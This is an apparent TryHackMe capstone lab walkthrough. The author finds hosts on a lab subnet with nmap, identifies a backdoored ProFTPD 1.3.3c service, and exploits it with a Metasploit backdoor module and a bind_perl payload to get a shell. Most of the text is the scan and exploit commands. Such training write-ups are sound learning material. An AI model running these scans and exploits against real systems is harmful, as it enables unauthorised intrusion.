MiroLabsCapstone

TryHackMe Directory





Flags will be BOLD





LETS GET SOME ROOT!

Since this one is a “Black Box” scenario we need to just try everything we can

First lets find the correct IP

nmap -n -sn 10.10.77.0-255

Looks like we have 2 possible choices, lets look into them

nmap 10.10.77.78

nmap 10.10.77.141

Lets go with the “basic” IP of 78 due to having 3 common exploitable port types

Lets look for any low hanging fruit

sudo nmap --script vuln -p 21-80 10.10.77.78 -v

This just seemed to freeze after 5ish minutes

Now lets try to see what is running

nmap -Pn -sV 10.10.77.78

Well this looks like it could be promising… Lets lookup that ProFTPD version

msfconsole

search ProFTPD 1.3.3c

We see that we may have a backdoor command we can try

use 4

set RHOSTS 10.10.77.78

show options

Lets try to run it!

run

Annnnnnddddd….. Fail…hmmmm lets look this up

This Link This link shows a possible answer

**nmap –script ftp-proftpd-backdoor -p 21 **

nmap --script ftp-proftpd-backdoor -p 21 10.10.77.78

Well.. Yay? that was a bit anticlimactic… Now how do we use it?

After some trial and error it seems we may not actually have a backdoor yet

After a new connection we have a new IP 10..10.38.231

More connection issues.. lets reboot

Lets try msfconsole again

New IP of 10.10.144.237

Whelp thats not working time to try another path

… I lied after some research we may need to pick a payload

msfconsole

search proftp

use 6

set RHOST 10.10.144.237

Show Options

Run

Now I see we need to select a payload

Show Payloads

set payload cmd/unix/bind_perl

ANNNNDDDD We are in!



TryHackMe Directory